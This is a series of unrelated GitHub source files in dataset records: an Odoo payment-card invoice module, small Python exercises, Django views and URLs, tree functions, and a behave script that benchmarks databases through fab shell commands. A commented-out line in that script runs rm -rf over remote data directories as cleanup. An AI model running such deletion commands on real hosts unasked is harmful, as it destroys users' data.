self.autoliquidation, self),\n self.company_id.display_name))\n taxes = [{'id': tax.id}]\n return taxes\n\n def _prepare_regular_taxes(self):\n # This method is inherited in l10n_fr_base_newgen_payment_card\n self.ensure_one()\n taxes = [{\n 'amount_type': 'percent',\n 'amount': self.vat_rate,\n 'unece_type_code': 'VAT',\n 'unece_categ_code': 'S',\n }]\n return taxes\n\n def _prepare_invoice_import(self):\n self.ensure_one()\n if self.force_invoice_date:\n date_dt = self.force_invoice_date\n elif self.payment_date:\n date_dt = self.payment_date\n else:\n date_dt = self.date\n date = fields.Date.to_string(date_dt)\n vat_compare = self.company_currency_id.compare_amounts(\n self.vat_company_currency, 0)\n total_compare = self.company_currency_id.compare_amounts(\n self.total_company_currency, 0)\n if vat_compare:\n if (\n self.country_id and\n self.company_id.country_id and\n self.country_id not in self._countries_vat_refund()):\n raise UserError(_(\n \"The transaction '%s' is associated with country \"\n \"'%s'. As we cannot refund VAT from this country, \"\n \"the VAT amount of that transaction should be updated \"\n \"to 0.\")\n % (self.name, self.country_id.name))\n if vat_compare != total_compare:\n raise UserError(_(\n \"The sign of the VAT amount (%s) should be the same as \"\n \"the sign of the total amount (%s).\")\n % (self.vat_company_currency, self.total_company_currency))\n\n taxes = self._prepare_regular_taxes()\n elif self.autoliquidation in ('intracom', 'extracom'):\n taxes = self._prepare_autoliquidation_taxes()\n else:\n taxes = []\n if not self.description:\n raise UserError(_(\"Description is missing on transaction %s.\") % self.name)\n origin = self.name\n if self.receipt_number:\n origin = '%s (%s)' % (origin, self.receipt_number)\n amount_untaxed = self.total_company_currency * -1\\\n - self.vat_company_currency * -1\n price_unit = amount_untaxed\n qty = 1\n if total_compare > 0: # refund\n qty *= -1\n price_unit *= -1\n parsed_inv = {\n 'partner': {'recordset': self.partner_id},\n 'date': date,\n 'date_due': date,\n 'currency': {'recordset': self.company_id.currency_id},\n 'amount_total': self.total_company_currency * -1,\n 'amount_untaxed': amount_untaxed,\n 'invoice_number': self.name,\n 'lines': [{\n 'taxes': taxes,\n 'price_unit': price_unit,\n 'name': self.description,\n 'qty': qty,\n 'uom': {'recordset': self.env.ref('uom.product_uom_unit')},\n }],\n 'origin': origin,\n }\n url = self.image_url\n attachments = self.env['ir.attachment'].search([\n ('res_model', '=', self._name),\n ('res_id', '=', self.id),\n ])\n if not url and not attachments and not self.receipt_lost:\n raise UserError(_(\n \"Missing image URL and/or attachments on transaction %s. \"\n \"If you lost that receipt, you can mark this transaction \"\n \"as 'Receipt Lost'.\")\n % self.name)\n\n parsed_inv['attachments'] = {}\n if url:\n try:\n rimage = requests.get(url, timeout=TIMEOUT)\n except Exception as e:\n raise UserError(_(\n \"Failed to download the image of the receipt. 
\"\n \"Error message: %s.\") % e)\n if rimage.status_code != 200:\n raise UserError(_(\n \"Could not download the image of transaction %s \"\n \"from URL %s (HTTP error code %s).\")\n % (self.name, url, rimage.status_code))\n image_binary = rimage.content\n file_extension = os.path.splitext(urlparse(url).path)[1]\n logger.debug('file_extension=%s', file_extension)\n if file_extension in ('.JPG', '.JPEG', '.jpg', '.jpeg'):\n logger.debug('Trying to rotate the JPG image %s', url)\n try:\n image_binary = self._rotate_image(image_binary)\n logger.info('JPEG file successfully rotated')\n except Exception as e:\n logger.info('Failed to rotate the image. Error: %s', e)\n pass\n filename = 'Receipt-%s%s' % (self.name, file_extension)\n image_b64 = base64.encodebytes(image_binary)\n parsed_inv['attachments'] = {filename: image_b64}\n if attachments:\n for att in attachments:\n parsed_inv['attachments'][att.name] = att.datas\n # TODO: delete attachments on transaction once invoice is created ?\n return parsed_inv\n\n @api.model\n def _rotate_image(self, image_binary):\n image_original_file = io.BytesIO()\n image_original_file.write(image_binary)\n original_image = Image.open(image_original_file)\n rotated_image = ImageOps.exif_transpose(original_image)\n rotated_image_file = io.BytesIO()\n rotated_image.save(rotated_image_file, format='JPEG')\n rotated_image_binary = rotated_image_file.getvalue()\n return rotated_image_binary\n\n def check_existing_invoice(self):\n assert self.invoice_id\n # should not happen because domain blocks that\n if self.invoice_id.currency_id != self.company_currency_id:\n raise UserError(_(\n \"For the moment, we don't support linking to an invoice \"\n \"in another currency than the company currency.\"))\n # should not happen because domain blocks that\n if self.invoice_id.payment_state != 'not_paid':\n raise UserError(_(\n \"The transaction %s is linked to invoice %s \"\n \"which is not in unpaid state.\")\n % (self.name, self.invoice_id.number))\n # should not happen because domain blocks that\n if self.invoice_id.move_type not in ('in_invoice', 'in_refund'):\n raise UserError(_(\n \"The transaction %s is linked to invoice %s \"\n \"which is not a supplier invoice/refund!\")\n % (self.name, self.invoice_id.name))\n # handled by onchange\n if self.partner_id != self.invoice_id.commercial_partner_id:\n raise UserError(_(\n \"The transaction %s is linked to partner '%s' \"\n \"whereas the related invoice %s is linked to \"\n \"partner '%s'.\") % (\n self.name, self.partner_id.display_name,\n self.invoice_id.display_name,\n self.invoice_id.commercial_partner_id.display_name))\n # TODO handle partial payments ?\n if self.company_currency_id.compare_amounts(\n self.invoice_id.amount_total_signed,\n self.total_company_currency):\n raise UserError(_(\n \"The transaction %s is linked to the \"\n \"invoice/refund %s whose total amount is %s, \"\n \"but the amount of the transaction is %s.\") % (\n self.name, self.invoice_id.name,\n format_amount(\n self.env,\n self.invoice_id.amount_total_signed * -1,\n self.invoice_id.currency_id),\n format_amount(\n self.env, self.total_company_currency, self.company_currency_id),\n ))\n\n def _prepare_invoice_import_config(self):\n self.ensure_one()\n if not self.expense_account_id:\n raise UserError(_(\n \"Missing expense account on transaction %s.\") % self.name)\n import_config = {\n 'invoice_line_method': 'nline_no_product',\n 'account': self.expense_account_id,\n 'analytic_distribution': self.analytic_distribution or False,\n }\n return 
import_config\n\n def generate_invoice(self):\n self.ensure_one()\n assert self.transaction_type == 'expense', 'wrong transaction type'\n aiio = self.env['account.invoice.import']\n parsed_inv = self._prepare_invoice_import()\n logger.debug('Payment card invoice import parsed_inv=%s', parsed_inv)\n parsed_inv = aiio.pre_process_parsed_inv(parsed_inv)\n import_config = self._prepare_invoice_import_config()\n invoice = aiio.create_invoice(\n parsed_inv, import_config=import_config, origin='Mooncard connector')\n invoice.message_post(\n body=_(\"Invoice created from payment card transaction %s.\")\n % self.name)\n invoice.with_context(validate_analytic=True)._post(soft=False)\n assert self.company_currency_id.compare_amounts(\n invoice.amount_tax, abs(self.vat_company_currency)) == 0, 'bug on VAT'\n return invoice\n\n def reconcile(self, bank_move, invoice):\n self.ensure_one()\n assert self.bank_counterpart_account_id\n assert bank_move\n assert invoice\n assert not self.reconcile_id, 'already has a reconcile mark'\n movelines_to_rec = self.env['account.move.line'].search([\n ('move_id', '=', bank_move.id),\n ('account_id', '=', self.bank_counterpart_account_id.id),\n ], limit=1)\n for line in invoice.line_ids:\n if line.account_id == self.bank_counterpart_account_id:\n movelines_to_rec += line\n movelines_to_rec.reconcile()\n return movelines_to_rec[0].full_reconcile_id\n\n @api.model\n def _prepare_import_speeddict(self, company):\n \"\"\"Used in provided-specific modules\"\"\"\n bdio = self.env['business.document.import']\n speeddict = {\n 'tokens': {}, 'accounts': {}, 'analytic': {},\n 'countries': {}, 'currencies': {}, 'mapping': {}}\n\n token_res = self.env['newgen.payment.card'].search_read(\n [('company_id', '=', company.id)], ['name'])\n for token in token_res:\n speeddict['tokens'][token['name']] = token['id']\n\n speeddict['accounts'] = bdio._prepare_account_speed_dict()\n\n analytic_res = self.env['account.analytic.account'].search_read(\n [('company_id', '=', company.id), ('code', '!=', False)], ['code'])\n for analytic in analytic_res:\n analytic_code = analytic['code'].strip().lower()\n speeddict['analytic'][analytic_code] = analytic['id']\n\n countries = self.env['res.country'].search_read(\n [('code', '!=', False)], ['code'])\n for country in countries:\n speeddict['countries'][country['code'].strip()] = country['id']\n speeddict['eu_country_ids'] = self.env.ref('base.europe').country_ids.ids\n if not company.country_id.id:\n raise UserError(_(\n \"Country is not set on company '%s'.\") % company.display_name)\n speeddict['my_country_id'] = company.country_id.id\n\n currencies = self.env['res.currency'].with_context(\n active_test=False).search_read([], ['name'])\n for curr in currencies:\n speeddict['currencies'][curr['name']] = curr['id']\n npcto = self.env['newgen.payment.card.transaction']\n map_res = self.env['newgen.payment.card.account.mapping'].search_read(\n [('company_id', '=', company.id)])\n for map_entry in map_res:\n speeddict['mapping'][\n (map_entry['card_id'][0],\n map_entry['expense_account_id'][0])] =\\\n map_entry['force_expense_account_id'][0]\n if not company.transfer_account_id:\n raise UserError(_(\n \"Missing 'Internal Bank Transfer Account' on company '%s'.\")\n % company.display_name)\n speeddict['transfer_account_id'] = company.transfer_account_id.id\n default_partner = self._default_partner(raise_if_not_found=True)\n if default_partner.parent_id:\n raise UserError(_(\n \"The default partner (%s) should be a parent partner.\")\n % 
default_partner.display_name)\n speeddict['default_partner_id'] = default_partner.id\n speeddict['partner_labels'] = {}\n specific_partner_existing_transactions = npcto.search_read([\n ('state', '=', 'done'),\n ('transaction_type', '=', 'expense'),\n ('vendor', '!=', False),\n ('partner_id', '!=', False),\n ('partner_id', '!=', speeddict['default_partner_id'])],\n ['vendor', 'partner_id'], order='id')\n # order by id to have the latest value for a particular label\n for trans in specific_partner_existing_transactions:\n label = unidecode(trans['vendor']).strip().upper()\n speeddict['partner_labels'][label] = trans['partner_id'][0]\n speeddict['partner_vat'] = {}\n speeddict['partner_names'] = {}\n partners = self.env['res.partner'].search_read(\n [('parent_id', '=', False), ('id', '!=', company.partner_id.id)],\n ['name', 'vat'])\n for partner in partners:\n partner_name = unidecode(partner['name'].strip().upper())\n if len(partner_name) >= MEANINGFUL_PARTNER_NAME_MIN_SIZE:\n speeddict['partner_names'][partner_name] = partner['id']\n if partner['vat']:\n # 'vat' field is already sanitized\n speeddict['partner_vat'][partner['vat']] = partner['id']\n speeddict['default_vat_rate'] = 0\n if (\n company.account_purchase_tax_id and\n company.account_purchase_tax_id.amount_type == 'percent' and\n float_compare(\n company.account_purchase_tax_id.amount, 0,\n precision_digits=4) > 0):\n speeddict['default_vat_rate'] =\\\n company.account_purchase_tax_id.amount\n return speeddict\n","repo_name":"akretion/odoo-mooncard-connector","sub_path":"base_newgen_payment_card/models/newgen_payment_card_transaction.py","file_name":"newgen_payment_card_transaction.py","file_ext":"py","file_size_in_byte":28978,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"91"}
+{"seq_id":"16306750259","text":"import math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nPV = 491.4\nUR = 0.1666\nd = 0.008\nSMP = 100\nREC = 50\nr = 0.045\n\ninput_year_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,\n 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,\n 21, 22, 23, 24, 25, 26, 27, 28, 29, 30,\n 31, 32, 33, 34, 35]\nBenefit = []\n\nprint(input_year_list)\nprint(input_year_list[0])\n\nfor i in input_year_list:\n def func_formulaA(input_year):\n sum = 0\n for n in range(0, input_year + 1):\n formulaD = math.pow(1 - d, n)\n formulaR = math.pow(1 + r, n)\n sum += (UR * formulaD * (SMP + REC) / formulaR)\n return sum\n\n formulaA = func_formulaA(i)\n Result = PV * 8760 * formulaA\n Benefit.append(Result/100000)\n\nprint('\\n')\nprint(Benefit[0])\nprint(Benefit[1])\nprint(Benefit[2])\nprint(Benefit[3])\nprint(Benefit[4])\nprint(Benefit[5])\nprint(Benefit[6])\nprint(Benefit[7])\n\n'''\nx = np.arange(8)\nplt.bar(x, Benefit)\nplt.xticks(x, input_year_list)\n\nplt.show()\n'''\nplt.plot(input_year_list, Benefit)\nplt.show()\n","repo_name":"JiHyun5990/Project2_Profit-solar","sub_path":"test04_총수익 그래프(5년).py","file_name":"test04_총수익 그래프(5년).py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"11302110005","text":"\nclass DataField(object):\n name = \"\"\n inputFields = []\n def __init__(self,name,inputFields):\n self.name = name\n self.inputFields = inputFields\n print('Init Field: ' + str(self.name))\n def isFieldDefined(self,definedFieldNames):\n for field in definedFieldNames:\n if field == self.name: return True\n return False\n\ndef isFieldDefined(fieldName,definedFieldNames):\n for defField in definedFieldNames:\n if defField == fieldName: return True\n return False \n\nclass ConditionParameter(object):\n name = \"\"\n inputFields = []\n def __init__(self,name,inputFields):\n self.name = name\n self.inputFields = inputFields\n\ndef initInputFields(data,inputFields):\n modData = data\n for field in inputFields:\n definedFields = data.columns\n if not isFieldDefined(field.name,definedFields):\n modData = initInputFields(modData,field.inputFields)\n print(field.name + ' Created')\n modData = field.createField(modData)\n return modData\n\ndef initializeDataFields(data,inputs):\n for inpt in inputs:\n data = initInputFields(data,inpt.inputFields)\n data = inpt.createField(data)\n return data\n","repo_name":"WasatchFlatlander/oop-data-script","sub_path":"SimBase.py","file_name":"SimBase.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"31459404504","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import include, url\n\nfrom .views import *\n\nurlpatterns = [\n\t#url(r'login', event_login, name='event_login'),\n\turl(r'visitor', add_visitor, name='add_visitor'),\n\turl(r'^register/(?P.+)/participant-info', visitor_registration_participant_information, name='participant_info'),\n\turl(r'^register/(?P.+)/participant-info', visitor_registration_participant_information, name='participant_info'),\n\turl(r'^register/(?P.+)/companion-info', visitor_registration_companion_information, name='companion_info'),\n\turl(r'^register/(?P.+)/events-selector', visitor_registration_events_selector, name='events_selector_visitor'),\n\turl(r'^register/(?P.+)/payment', visitor_registration_payment, name='payment'),\n\turl(r'^register/(?P.+)/send_upn', send_upn, name='send_upn'),\n\turl(r'^payment/(?P.+)/', create_paypal, name='create_paypal'),\n\turl(r'^payment/(?P.+)/execute/', create_paypal, name='paypal_execute'),\n\t]","repo_name":"NewProjectUsername/project","sub_path":"Visitor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38342434014","text":"import random\n\nchoiceList = [\"Rock\", \"Scissors\", \"Paper\"]\nuserScore = 0\ncomputerScore = 0\n\nhumanToNumber = {\"R\": 1,\n \"S\": 2,\n \"P\": 3}\nplay = 1\nwhile play > 0:\n userInput = input(\"------------------\\nWrite your Choice\\n1.Rock\\n2.Paper\\n3.Scissors\\nEnter Here:-\")\n userInput = userInput.capitalize()\n\n if userInput in choiceList:\n computerInput = str(random.choice(choiceList))\n print(f\"Computer Chooses:-{computerInput}\")\n computerInput = humanToNumber[computerInput[0]]\n userInput = humanToNumber[userInput[0]]\n\n if userInput == computerInput:\n print(\"------------------\\nTie\\n------------------\")\n elif userInput == (computerInput % 3) + 1:\n print(\"------------------\\nComputer Wins\\n------------------\")\n computerScore += 1\n else:\n print(\"------------------\\nPlayer Wins\\n------------------\")\n userScore += 1\n print(f\"Computer:-{computerScore}\\nPlayer:-{userScore}\")\n\n else:\n print(\"Your input is invalid....\\nPlease enter again!\")\n\n play = int(input(\"------------------\\nTo Exit press 0\\nTo Continue press 1\\nEnter here:-\"))\n\n# Here we take input from the user and convert to a number using humanToNumber Dictionary\n# For random selection of computer, we have created a choiceList List and we select from it using random.choice(choiceList) method\n# For Win/Loss logic we are using arithmetic operator(%) modulo.\n# To understand this logic visit https://therenegadecoder.com/code/rock-paper-scissors-using-modular-arithmetic/#the-modular-arithmetic-minimalist\n","repo_name":"arhamshah/PythonBasicProjects","sub_path":"P3-RockPaperScissors.py","file_name":"P3-RockPaperScissors.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"15321249923","text":"import os,glob\n# print(os.listdir())\n# for f in os.listdir():\n# if f.endswith('.py'):\n# os.remove(f)\n# print(glob.glob('*')\n# print(d['abc'])\n# s='a'\n# print(int(s))\n# print(10/0)i\n# import pymysql\n# coon = pymysql.connect(host='118.24.3.40',user='jxz',\n# password='123456',db='jxz')\n# cur= coon.cursor()\n# cur.execute('select from a;')\n#\n# for i in range(20):\n# print(i)\n\n# try:\n# s = 10/0\n# except ZeroDivisionError as e:\n# # except ZeroDivisionError, e: 这个是python2里面的写法\n# print('走这里')\n# print(e)\n\ndef calc(a,b):\n try:\n res = a/b\n # except ZeroDivisionError as e:\n # res = '除数不能为零, %s'%e\n # except TypeError as e:\n # res = '类型错误,只能数字类型 %s'%e\n except Exception as e:\n print(e)\n # return res\n# res = calc('k',1) #TypeError\n# # calc(10,0) # ZeroDivisionError\n# res = calc(10,0) #TypeError\n\n\nmoney = input('enter:')\ntry:\n money = int(money)\nexcept Exception as e:#产生异常了,走这边\n print('输入金额错误!')\nelse:#没有出现异常的话就这里\n print(money+1)\nfinally:\n print('什么时候执行finally')\n\n# sssk\n# 689\n\n","repo_name":"Zzhard/jnz","sub_path":"day11/呵呵呵.py","file_name":"呵呵呵.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2321555842","text":"from behave import *\nimport time\nfrom time import sleep\n#from os import system as run\nfrom subprocess import call as run\nfrom subprocess import Popen, PIPE, STDOUT\n\n#DB = 'aerospike'\nDB = 'infinispan'\n\nlog_file = '/local/logs/out.log'\n\nSMP = 10\nPROCS = {\n\t'aerospike': 'asd',\n\t'redis': 'redis-server',\n\t'infinispan': 'java',\n\t'cassandra': 'java'\n}\nWARMUPS = {\n\t'aerospike': 0.05,\n\t'redis': 1.7,\n\t'infinispan': 0.05,\n\t'cassandra': 0.05\n}\nMAX_TPS = {\n\t'aerospike': {\n\t\t'1k': {\n\t\t\t'1k_r100': 500000,\n\t\t\t'1k_r50w50': 500000,\n\t\t\t'1k_w100': 500000\n\t\t},\n\t\t'5k': {\n\t\t\t'1k_r100': 250000,\n\t\t\t'1k_r50w50': 250000,\n\t\t\t'1k_w100': 250000\n\t\t},\n\t\t'32k': {\n\t\t\t'1k_r100': 50000,\n\t\t\t'1k_r50w50': 50000,\n\t\t\t'1k_w100': 50000\n\t\t}\n\t},\n\t'redis' : {\n\t\t'1k': {\n\t\t\t'1k_r100': 500000,\n\t\t\t'1k_r50w50': 500000,\n\t\t\t'1k_w100': 500000\n\t\t},\n\t\t'5k': {\n\t\t\t'1k_r100': 250000,\n\t\t\t'1k_r50w50': 250000,\n\t\t\t'1k_w100': 250000\n\t\t},\n\t\t'32k': {\n\t\t\t'1k_r100': 50000,\n\t\t\t'1k_r50w50': 50000,\n\t\t\t'1k_w100': 50000\n\t\t}\n\t},\n\t'infinispan': {\n\t\t'1k': {\n\t\t\t'1k_r100': 500000,\n\t\t\t'1k_r50w50': 100000,\n\t\t\t'1k_w100': 50000\n\t\t},\n\t\t'5k': {\n\t\t\t'5k_r100': 250000,\n\t\t\t'5k_r50w50': 50000,\n\t\t\t'5k_w100': 50000\n\t\t},\n\t\t'32k': {\n\t\t\t'32k_r100': 50000,\n\t\t\t'32k_r50w50': 10000,\n\t\t\t'32k_w100': 10000\n\t\t}\n\t},\n\t'cassandra': {\n\t\t'1k': {\n\t\t\t'1k_r100': 500000,\n\t\t\t'1k_r50w50': 100000,\n\t\t\t'1k_w100': 100000\n\t\t},\n\t\t'5k': {\n\t\t\t'5k_r100': 250000,\n\t\t\t'5k_r50w50': 50000,\n\t\t\t'5k_w100': 50000\n\t\t},\n\t\t'32k': {\n\t\t\t'32k_r100': 50000,\n\t\t\t'32k_r50w50': 10000,\n\t\t\t'32k_w100': 10000\n\t\t}\n\t}\n}\nCONFIG = {\n\t'db': DB,\n\t'action': 'run',\n\t'workload': 'a',\n\t'recordcount': 4000000,\n\t'runtime': 3,\n\t'threads': 400,\n\t'target': 0,\n\t'mark': 'baseline',\n\t'save': 'true',\n\t'proc': PROCS[DB],\n\t'nic': 'eth0',\n\t'device': 'vda2',\n}\nCMDS = [\n\t'fab run_test:{action},workload={workload},recordcount={recordcount},runtime={runtime},threads={threads},target={target},mark={mark},save={save} --set db={db}',\n\t'fab monitorit:mark={mark},proc={proc},nic={nic},device={device},duration={runtime},save={save} --set db={db}'\n]\n\n\ndef run_test(config):\n\tprocs = []\n\ttimeout = CONFIG['runtime']*60 + 30\n\twith open(log_file, 'a') as fdout:\n\t\tfor cmd in CMDS:\n\t\t\tcmd = cmd.format(**config)\n\t\t\tp = Popen(cmd, stdout=fdout, stderr=STDOUT, shell=True)\n\t\t\tprint(' '*4 + cmd)\n\t\t\tprint(' '*6 + 'start at: {0}'.format(time.time()))\n\t\t\tprocs.append([p, True, cmd.split(':')[0].split()[-1]])\n\t\t\tsleep(WARMUPS[DB]*60)\n\t\tall_procs = len(procs)\n\t\tdone_procs = 0\n\t\tsleep(CONFIG['runtime']*60)\n\t\tcount = CONFIG['runtime']*60\n\t\twhile done_procs < all_procs:\n\t\t\tsleep(1)\n\t\t\tcount += 1\n\t\t\tfor p in procs:\n\t\t\t\tif p[1] and p[0].poll() is not None:\n\t\t\t\t\tdone_procs += 1\n\t\t\t\t\tp[1] = False\n\t\t\t\t\tprint(' '*6 + '{1} stop at: {0}'.format(time.time(), p[2]))\n\t\t\t\t\t#do something done this process\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\t\tif count > timeout:\n\t\t\t\t\tp[0].terminate()\n\t\t\t\t\tdone_procs += 1\n\t\t\t\t\tp[1] = False\n\t\t\t\t\tprint(' '*6 + '{1} stop at: {0}'.format(time.time(), p[2]))\n\t\t\t\t\tbreak\n\n# steps\n\n@given(u'stop cluster')\ndef step_impl(context):\n\t#run('fab service:{0},stop'.format(DB))\n\tpass\n\n@given(u'clean disk')\ndef 
step_impl(context):\n\t#run(\"fab remote_run:'rm -rf /local/data/{0}/*'\".format(DB))\n\tpass\n\n@given(u'start cluster')\ndef step_impl(context):\n\tpass\n\n@given(u'cluster is ready')\ndef step_impl(context):\n\tassert True\n\n@when('load data into cluster')\ndef step_impl(context):\n\tassert True\n\n@then('run the baseline cases')\ndef step_impl(context):\n\tconfig = {}\n\tconfig.update(CONFIG)\n\tconfig['runtime'] += WARMUPS[DB]\n\tfor row in context.table:\n\t\tconfig['workload'] = row['workload']\n\t\tprint('running workload: {0}'.format(config['workload']))\n\t\tassert len(context.tags) == 1\n\t\tcase = list(context.tags)[0]\n\t\tmax_tps = MAX_TPS[DB][case][config['workload']]\n\t\tinterval = max_tps/SMP\n\t\tsamples = range(interval, max_tps, interval)\n\t\tsamples.append(max_tps)\n\t\tsamples.append(0)\n\t\tcount = 1\n\t\tfor target in samples:\n\t\t\tconfig['target'] = target\n\t\t\tmark = 'bl_' + config['workload'] + '_' + str(count)\n\t\t\tcount += 1\n\t\t\tconfig['mark'] = mark\n\t\t\tprint(' target TPS: {0}'.format(config['target']))\n\t\t\trun_test(config)\n\t\t\tprint(' '*8 + 'done')\n\t\t\tsleep(10)\n","repo_name":"sanpingz/dbtest","sub_path":"tools/behave/backups/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"5049135224","text":"import pytest\n\nfrom src.argteller.decorators.class_decorator import ArgtellerClassDecorator\n\nsample_dsl1=\"\"\"\nTopic_1\n-param1:option1\n =option1\n -paramA:a\n =option2\n -paramB:b\n\nTopic_2\n-param2:asdf\n\nTopic_3\n-param3:A\n =A\n -Topic_1/param1:option1\n -Topic_1/paramA:value1\n -Topic_2/param2:value1\n =B\n -Topic_1/param1:option2\n -Topic_1/paramB:value2\n -Topic_2/param2:value2\n\"\"\"\n\n@ArgtellerClassDecorator(dsl=sample_dsl1)\nclass TestClass1():\n\n\tdef __init__(self):\n\n\t\tpass\n\ndef test_sample_dsl1():\n\n\ttest = TestClass1()\n\n\tassert test.param1=='option1'\n\tassert test.paramA=='value1'\n\tassert test.param2=='value1'\n\n\nsample_dsl2=\"\"\"\n\nTopic_1\n\n-param1:option1\n =option1\n -paramA:a\n =option2\n -paramB:b\n\nTopic_2\n-param2:1/5\n\nTopic_3\n-param3:A\n =A\n -Topic_1/param1:option1\n -Topic_1/paramA:1/5\n =B\n -Topic_1/param1:option2\n -Topic_1/paramB:value2\n\n\"\"\"\n\n@ArgtellerClassDecorator(dsl=sample_dsl2)\nclass TestClass2():\n\n\tdef __init__(self):\n\n\t\tpass\n\ndef test_sample_dsl2():\n\n\ttest = TestClass2()\n\n\tassert test.paramA==0.2\n\tassert test.param2==0.2\n\n\n\n\n\n","repo_name":"mozjay0619/argteller-viz","sub_path":"tests/test_dsls.py","file_name":"test_dsls.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7488271203","text":"def inorder_tree_walk(x):\n if x != None:\n inorder_tree_walk(x.left)\n print(x.data.a2)\n inorder_tree_walk(x.right)\n\ndef tree_search(x, k):\n if x == None or x.data.a1 == k:\n return x\n if k < x.data.a1:\n return tree_search(x.left, k)\n else:\n return tree_search(x.right, k)\n\ndef tree_minimum(x):\n while x.left != None:\n x = x.left\n return x\n\ndef tree_maximum(x):\n while x.right != None:\n x = x.right\n return x\n\ndef tree_successor(x):\n if x.right != None:\n return tree_minimum(x.right)\n y = x.p\n while y != None and x == y.right:\n x = y\n y = y.p\n return y\n\ndef tree_insert(T, z):\n y = None\n x = T\n while x != None:\n y = x\n if z.data.a1 < x.data.a1:\n x = x.left\n else:\n x = x.right\n z.p = y\n if y == None:\n T = z\n elif z.data.a1 < y.data.a1:\n y.left = z\n else:\n y.right = z\n return T\n\ndef tree_delete(T, z):\n if z.left == None:\n transplant(T, z, z.right)\n elif z.right == None:\n transplant(T, z, z.left)\n else:\n y = tree_minimum(z.right)\n if y.p != z:\n transplant(tree_delete, y, y.right)\n y.right = z.right\n y.right.p = y\n transplant(T, z, y)\n y.left = z.left\n y.left.p = y\n\ndef transplant(T, u, v):\n if u.p == None:\n T = v\n elif u == u.p.left:\n u.p.left = v\n else:\n u.p.right = v\n if v != None:\n v.p = u.p\n\ndef inorder_tree_walk_list(x, l):\n if x != None:\n inorder_tree_walk_list(x.left, l)\n l.append(x.data)\n inorder_tree_walk_list(x.right, l)\n","repo_name":"MilovanTomasevic/com","sub_path":"courses/python/files/vezba05/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"37921718012","text":"# coding:utf-8\nimport sys\nimport os\nf = open('input_so.txt', 'r')\nsys.stdin = f\n\nN = int(input())\na = list(map(int,input().split()))\nans = 0\n\nwhile (1):\n for i in range(N):\n if(a[i]%2 == 0):\n a[i] = a[i]/2\n else:\n break\n if(i != N-1):\n break\n else:\n ans += 1\n\nprint(\"{}\".format(ans))\n","repo_name":"arbol962/competitivePrograming","sub_path":"ABS/so.py","file_name":"so.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2616616485","text":"# Atrybuty zarządzane oparte na właściwościach\n\nclass String:\n def __init__(self, name):\n self.name = name\n def __get__(self, instance, cls):\n if instance is None:\n return self\n return instance.__dict__[self.name]\n\n def __set__(self, instance, value):\n if not isinstance(value, str):\n raise TypeError('Oczekiwano łańcucha znaków')\n instance.__dict__[self.name] = value\n\n\nclass Person:\n name = String('name')\n def __init__(self, name):\n self.name = name\n\nclass SubPerson(Person):\n @property\n def name(self):\n print('Pobieranie imienia')\n return super().name\n\n @name.setter\n def name(self, value):\n print('Ustawianie imienia na:', value)\n super(SubPerson, SubPerson).name.__set__(self, value)\n\n @name.deleter\n def name(self):\n print('Usuwanie imienia')\n super(SubPerson, SubPerson).name.__delete__(self)\n\nif __name__ == '__main__':\n a = Person('Gucio')\n print(a.name)\n a.name = 'Dawid'\n print(a.name)\n try:\n a.name = 42\n except TypeError as e:\n print(e)\n","repo_name":"anpadoma/python_receptury3","sub_path":"R08/rozwijanie_właściwości_w_klasie_pochodnej/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33312954469","text":"from datetime import datetime\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import Specification\nfrom cars.models import Car\nfrom django.shortcuts import get_object_or_404\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.decorators import login_required\n\n\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMessage\n\nimport threading\n\n# Create your views here.\n\n@login_required(login_url = 'login')\ndef filterForm(request):\n\n year = [x for x in range(2010,datetime.now().year)]\n\n data = {'years':year}\n return render(request,'notify/carForm.html',data)\n\ndef filterSubmit(request):\n if request.method == 'POST':\n user_id = request.POST['user_id']\n name = request.POST['name']\n email = request.POST['email']\n brand = request.POST['brand']\n model = request.POST['model']\n body_style = request.POST['body_style']\n fuel = request.POST['fuel']\n transmission = request.POST['transmission']\n color = request.POST['color']\n year = request.POST['year']\n milage = request.POST['milage']\n min_price = int(request.POST['min_price'])\n max_price = int(request.POST['max_price'])\n\n\n hasSpecified = Specification.objects.filter(user_id=user_id, brand=brand, model=model, body_style=body_style, fuel=fuel, transmission=transmission, color=color, year=year, milage=milage, min_price=min_price, max_price=max_price).exists()\n\n if hasSpecified:\n messages.error(request, 'You have already made an exact filter request...')\n return redirect('/notify/')\n\n specs = Specification(user_id=user_id, name=name, email=email, brand=brand, model=model, body_style=body_style, fuel=fuel, transmission=transmission, color=color, year=year, milage=milage, 